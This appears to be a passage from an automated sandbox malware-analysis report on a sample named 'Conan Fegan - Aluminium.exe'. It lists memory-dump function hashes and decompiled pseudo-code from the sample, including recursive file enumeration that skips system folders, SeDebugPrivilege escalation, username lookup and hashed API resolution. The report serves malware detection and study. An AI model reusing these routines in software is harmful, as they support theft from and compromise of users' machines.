                                            • Instruction Fuzzy Hash: AD115BB1D002598FDB10CFAAC4487EEFBF4EF88324F148429E555A7240CB786944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3A3D8, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 0d0b212eca85575efebb4c25a592070b2431fe48524fbfb5566178a468326af6
                                            • Instruction ID: e821f7d4c1917e723833c97d7650ae15c6338cb4059ed6e17d7542d43f4133ee
                                            • Opcode Fuzzy Hash: 0d0b212eca85575efebb4c25a592070b2431fe48524fbfb5566178a468326af6
                                            • Instruction Fuzzy Hash: 10113AB19003598FDB10DFAAC4447EEFBF4AF88224F148429E555B7240CB78A944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3CA01, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 07A3CA65
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: fb454ea4b00a2eefd5b26cbfe3c8e3d1391cd0bb8c7326d39128415014573755
                                            • Instruction ID: 7fd5161198a2dbbb642b0630feb652b9778738ad225a33fefa4094b2c6984c2c
                                            • Opcode Fuzzy Hash: fb454ea4b00a2eefd5b26cbfe3c8e3d1391cd0bb8c7326d39128415014573755
                                            • Instruction Fuzzy Hash: 0511F5B58003499FDB10CF99D884BDEBFF8EB49324F14881AE464A7640C374A554CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3CA08, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 07A3CA65
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: a466e5f8970eab635a569f17b3b51eb79b988c24e93d34df5f560c4ee266b917
                                            • Instruction ID: c59770541b0a8e93282030b11d17af792061ba811273e79a4720ac18e374f6a1
                                            • Opcode Fuzzy Hash: a466e5f8970eab635a569f17b3b51eb79b988c24e93d34df5f560c4ee266b917
                                            • Instruction Fuzzy Hash: F811E5B58003599FDB10CF99D884BDEBBF8FB48324F14881AE964B7640C378A554CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0107D3B4, Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651195773.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 514a62291b0ab0dff525e23cf6ca120f9b68910d1da92c911729cb1c1cb5a4b0
                                            • Instruction ID: 7e4a17378e8d72e4ca92785da1a492bfb20980f417bb77a401a744d23444f48e
                                            • Opcode Fuzzy Hash: 514a62291b0ab0dff525e23cf6ca120f9b68910d1da92c911729cb1c1cb5a4b0
                                            • Instruction Fuzzy Hash: 24213AB1904240EFDB01CF54D8C0B5ABFA5FF84324F24C6A9E9855B247C736E856C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0108D01C, Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651219950.000000000108D000.00000040.00000001.sdmp, Offset: 0108D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d02d2958e78657cc607857b8c4113de119c8a9627032bf1ad0a8e5c299700f8
                                            • Instruction ID: 3763e30f1f43c88458716377c3392cc47f097bbc94ab00f14a52b390f0e98e0e
                                            • Opcode Fuzzy Hash: 2d02d2958e78657cc607857b8c4113de119c8a9627032bf1ad0a8e5c299700f8
                                            • Instruction Fuzzy Hash: 93212571508240DFDB15EF94D8C0B1ABBA5FB84364F24CBA9E9C94B286C736D807CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0108D1D4, Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651219950.000000000108D000.00000040.00000001.sdmp, Offset: 0108D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d3ceb6818559e357fefdc03033e19d9c677d957a4e8f081844f2acab53107900
                                            • Instruction ID: 8641097dd135ada54a01bb80ef9816c33e74629e4e33f3ec02f386a7208abea6
                                            • Opcode Fuzzy Hash: d3ceb6818559e357fefdc03033e19d9c677d957a4e8f081844f2acab53107900
                                            • Instruction Fuzzy Hash: CB2137B1508240EFDB41EF94D5C0B2ABBA5FB94324F24C7ADD9C94B286C336D806CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0107D3AF, Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651195773.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 987ae082b2f359035be596b84dcad585c5d9c7b80c54fd1badd6de72d9b1f1a2
                                            • Instruction ID: e922ef22d585172fd912c5c2014ddc70b12835edc22943e25f563bfb8e876677
                                            • Opcode Fuzzy Hash: 987ae082b2f359035be596b84dcad585c5d9c7b80c54fd1badd6de72d9b1f1a2
                                            • Instruction Fuzzy Hash: 0411AF76804280DFDB12CF54D9C4B56BFB1FB84324F24C6A9D8850B616C33AE456CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0108D1CF, Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651219950.000000000108D000.00000040.00000001.sdmp, Offset: 0108D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84522397b0c0072479584b34e9b527c289f971b5c41eac134402e64a3c6926ae
                                            • Instruction ID: 684e0ba18b2330078f4febd3fd4629f2bd6656317f5fd120d650c2fb1d6e2b1d
                                            • Opcode Fuzzy Hash: 84522397b0c0072479584b34e9b527c289f971b5c41eac134402e64a3c6926ae
                                            • Instruction Fuzzy Hash: BE11BB75908280DFDB42DF54D5C4B15FBB1FB84324F28C6AAD8894B696C33AD44ACB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0108D017, Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651219950.000000000108D000.00000040.00000001.sdmp, Offset: 0108D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84522397b0c0072479584b34e9b527c289f971b5c41eac134402e64a3c6926ae
                                            • Instruction ID: 06271c543cbe64e1690f9fd67948915d23a4225a2090413a6c366cfa85fb3d78
                                            • Opcode Fuzzy Hash: 84522397b0c0072479584b34e9b527c289f971b5c41eac134402e64a3c6926ae
                                            • Instruction Fuzzy Hash: C611AC75508280DFDB12DF54D584B15BBA1EB44224F24C6AAE8894B696C33AD44BCF61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0107D745, Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651195773.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: becf4d4b8ce27c18561d18236b3c2088baeb7e22cad0d69d0cd1122a9b0f19e7
                                            • Instruction ID: c6319fe9dba1a2741ade09cdd7b0d3f57dcdbb5b7c5c176753e7faf75bd542dd
                                            • Opcode Fuzzy Hash: becf4d4b8ce27c18561d18236b3c2088baeb7e22cad0d69d0cd1122a9b0f19e7
                                            • Instruction Fuzzy Hash: 9E0120718083C09AF7104E55CC84B66FFD8FF41234F08C55AEE844B246E7799844CBB5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0107D744, Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.651195773.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2ad4f520ce68d6f6bafd001d1730bc0de7970a27c1b32f5e5566dcf30994aee
                                            • Instruction ID: 9320b606002076e2ad2a8168dbf068fe5abd1985911d9ecd9e886238ae749d1b
                                            • Opcode Fuzzy Hash: b2ad4f520ce68d6f6bafd001d1730bc0de7970a27c1b32f5e5566dcf30994aee
                                            • Instruction Fuzzy Hash: A2F09671404384AEE7518E1ACCC4B66FFE8EF81634F18C45AED485B287D7799844CBB5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 0096B3F4, Relevance: 2.0, Instructions: 2019COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.650807903.0000000000962000.00000002.00020000.sdmp, Offset: 00960000, based on PE: true
                                            • Associated: 00000000.00000002.650797619.0000000000960000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.650852695.00000000009C4000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f8d9c6644249dd40319717c8680fb5221ed0250c9ad842b7f002a7434f70082
                                            • Instruction ID: 4dad0bf35faeb60903dd609fffb7409257426960bd9b530dea0472a63d061df7
                                            • Opcode Fuzzy Hash: 6f8d9c6644249dd40319717c8680fb5221ed0250c9ad842b7f002a7434f70082
                                            • Instruction Fuzzy Hash: 25F2796100E7C25FDB038B749D711E1BFB5AE5322431E48D7D4C0CF4A3E21969A9EBA6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096A47C, Relevance: 2.0, Instructions: 1964COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.650807903.0000000000962000.00000002.00020000.sdmp, Offset: 00960000, based on PE: true
                                            • Associated: 00000000.00000002.650797619.0000000000960000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.650852695.00000000009C4000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e4cca4bdf7a2deb0d126d08fdff85d31f4afd462d11d84347a8c15abe18a08c
                                            • Instruction ID: d88095cab98b70616676a127377a21a99d867c031bff234edb9f9d6d1b0ec057
                                            • Opcode Fuzzy Hash: 6e4cca4bdf7a2deb0d126d08fdff85d31f4afd462d11d84347a8c15abe18a08c
                                            • Instruction Fuzzy Hash: 8AF2246140F7C29FC7038B749D756A0BFB1AE5321471E49CBC4C18F1A3E2195A9AEB63
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00969526, Relevance: 1.2, Instructions: 1217COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.650807903.0000000000962000.00000002.00020000.sdmp, Offset: 00960000, based on PE: true
                                            • Associated: 00000000.00000002.650797619.0000000000960000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.650852695.00000000009C4000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96be765d227373fb7c4916afdcb49b650645f133a3ce0a63cf5e0e0e5884343e
                                            • Instruction ID: 4f4855e7b8f5a2ffffc75ba164d897c3ac1bd83302794820ad02c2ce678b3473
                                            • Opcode Fuzzy Hash: 96be765d227373fb7c4916afdcb49b650645f133a3ce0a63cf5e0e0e5884343e
                                            • Instruction Fuzzy Hash: F292466244EBC15FCB035B782DB12D17FB29D6722430E49C7C4C08F5A3E4196A9BE762
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A30D80, Relevance: .9, Instructions: 912COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bcfe2d86c08dfaa0227e6c20cd16e11605e805ee7feea873a0241bcd204abb2a
                                            • Instruction ID: 774e61bf12596e37264435616ad1b266372ef461f726e86334de4159885abac3
                                            • Opcode Fuzzy Hash: bcfe2d86c08dfaa0227e6c20cd16e11605e805ee7feea873a0241bcd204abb2a
                                            • Instruction Fuzzy Hash: B4824BB0A0060ACFDB14CF68D584AAEBBF2BF89315F158569F465DB2A1C730EC41CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A38417, Relevance: .4, Instructions: 430COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e66a9bd6a876644cb171890d794effe59a5eb57d3f62e08e050b6a88071d25ee
                                            • Instruction ID: 03cd6a9f3b71db3d81d1e09798cb6cd9aed6f6aae70eb65e5aff92339cc618de
                                            • Opcode Fuzzy Hash: e66a9bd6a876644cb171890d794effe59a5eb57d3f62e08e050b6a88071d25ee
                                            • Instruction Fuzzy Hash: 8DD158BB9197909FEB15EFB8F4054D5BFA4FA1A77131480BBE014CAA09E7314142CBE5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A34190, Relevance: .2, Instructions: 196COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 02a26637b7d843d168b0262d6f00dc4a8bd9e05d1f44bb5d12b109c6948ce902
                                            • Instruction ID: 7d4069a180c554ba7a257662bef91b000314a66c93fb29f558bfd5de01837a56
                                            • Opcode Fuzzy Hash: 02a26637b7d843d168b0262d6f00dc4a8bd9e05d1f44bb5d12b109c6948ce902
                                            • Instruction Fuzzy Hash: 33A18EB0E116288FEB64DF69C980BCEBBF5BF88304F5482E5D15CA6205E7305A96CF05
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A32BC7, Relevance: .2, Instructions: 151COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e717b43a91ff58c0c73f466001e02d9bfb0a994cb9b10368cf6e7d970ece39fd
                                            • Instruction ID: 041d61afc4a41326f04a615c645aae3db1562c6c4c0cf97c9399c97fdddbdbb8
                                            • Opcode Fuzzy Hash: e717b43a91ff58c0c73f466001e02d9bfb0a994cb9b10368cf6e7d970ece39fd
                                            • Instruction Fuzzy Hash: 08515970D156498FD744EF75E8457AE7FF2EF89208F14C629E008AF2A4DF7468068BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A32BD8, Relevance: .1, Instructions: 144COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b2e5c5687473729d63b2b8df23433fa34b94f694fe01d9f26bcdbb3c75b1bd7
                                            • Instruction ID: 3bd21bdfbb3d6800c49e1d7542fab5b43b80b70ec05509280b4a33d67a6f2833
                                            • Opcode Fuzzy Hash: 6b2e5c5687473729d63b2b8df23433fa34b94f694fe01d9f26bcdbb3c75b1bd7
                                            • Instruction Fuzzy Hash: 44517A70E156098FD744EFA5E8447AEBBF2EF89208F14C529E0049F3A4DF706806CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: Conan Fegan - Aluminium.exe PID: 7008 Parent PID: 4748 Conan Fegan - Aluminium.exeCOMMON

                                            Executed Functions

                                            Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                                            0x00403d82
                                            0x00403d88
                                            0x00403d8c
                                            0x00403d8d
                                            0x00403d90
                                            0x00403ea9
                                            0x00403ea9
                                            0x00403eb9
                                            0x00403ebb
                                            0x00403ec0
                                            0x00403f95
                                            0x00403f95
                                            0x00000000
                                            0x00403f95
                                            0x00403ece
                                            0x00403edb
                                            0x00403edd
                                            0x00403ee2
                                            0x00403f8e
                                            0x00403f8f
                                            0x00000000
                                            0x00403f94
                                            0x00000000
                                            0x00403ee8
                                            0x00403ef8
                                            0x00403f0a
                                            0x00403f12
                                            0x00403f18
                                            0x00403f26
                                            0x00403f28
                                            0x00403f2d
                                            0x00000000
                                            0x00000000
                                            0x00403f33
                                            0x00403f76
                                            0x00403f7c
                                            0x00000000
                                            0x00403f83
                                            0x00403f36
                                            0x00403f3a
                                            0x00000000
                                            0x00403f40
                                            0x00403f0c
                                            0x00403f10
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403f41
                                            0x00403f41
                                            0x00403f4b
                                            0x00403f58
                                            0x00403f5c
                                            0x00403f88
                                            0x00000000
                                            0x00403f8d
                                            0x00403f60
                                            0x00000000
                                            0x00403f60
                                            0x00403ef8
                                            0x00403ee8
                                            0x00403da3
                                            0x00403da9
                                            0x00403ea6
                                            0x00403ea8
                                            0x00000000
                                            0x00403ea8
                                            0x00403db7
                                            0x00403dc4
                                            0x00403dc6
                                            0x00403dcb
                                            0x00403e9d
                                            0x00403e9e
                                            0x00403ea4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403dd1
                                            0x00403dd1
                                            0x00403dd8
                                            0x00000000
                                            0x00000000
                                            0x00403de2
                                            0x00403e12
                                            0x00403e22
                                            0x00403e30
                                            0x00403e36
                                            0x00403e3f
                                            0x00403e44
                                            0x00403e47
                                            0x00403e4a
                                            0x00403e4c
                                            0x00000000
                                            0x00000000
                                            0x00403e63
                                            0x00403e65
                                            0x00403e6a
                                            0x00403e6f
                                            0x00403f64
                                            0x00403f6a
                                            0x00000000
                                            0x00403f71
                                            0x00000000
                                            0x00403e6f
                                            0x00403e26
                                            0x00403e27
                                            0x00403e2e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403e2e
                                            0x00403dea
                                            0x00403df9
                                            0x00000000
                                            0x00000000
                                            0x00403e01
                                            0x00403e10
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403e75
                                            0x00403e7f
                                            0x00403e8c
                                            0x00403e8e
                                            0x00403e97
                                            0x00000000

                                            APIs
                                            • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                            • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                            • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                            • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileFind$FirstNext
                                            • String ID: %s\%s$%s\*$Program Files$Windows
                                            • API String ID: 1690352074-2009209621
                                            • Opcode ID: 16b975ea2879a45a9effdb1f305e21ca7c68cdc893d4167e4adf6413639c420c
                                            • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                            • Opcode Fuzzy Hash: 16b975ea2879a45a9effdb1f305e21ca7c68cdc893d4167e4adf6413639c420c
                                            • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 78%
                                            			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                                            0x00406512
                                            0x00406514
                                            0x00406522
                                            0x00406524
                                            0x00406530
                                            0x00406534
                                            0x0040653f
                                            0x0040654e
                                            0x00406552
                                            0x0040655a
                                            0x0040655f
                                            0x0040656d
                                            0x00406570
                                            0x00406573
                                            0x0040657a
                                            0x00406589
                                            0x0040658d
                                            0x00406590
                                            0x00406594
                                            0x00000000
                                            0x0040659a
                                            0x004065a1

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                            • String ID: SeDebugPrivilege
                                            • API String ID: 3615134276-2896544425
                                            • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                            • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                            • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                            • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                                            0x00402b8c
                                            0x00402b92
                                            0x00402b96
                                            0x00402b9e
                                            0x00402ba3
                                            0x00402baa

                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                            • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateProcess
                                            • String ID:
                                            • API String ID: 1357844191-0
                                            • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                            • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                            • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                            • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                                            0x00406077
                                            0x00406082
                                            0x00406085

                                            APIs
                                            • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: NameUser
                                            • String ID:
                                            • API String ID: 2645101109-0
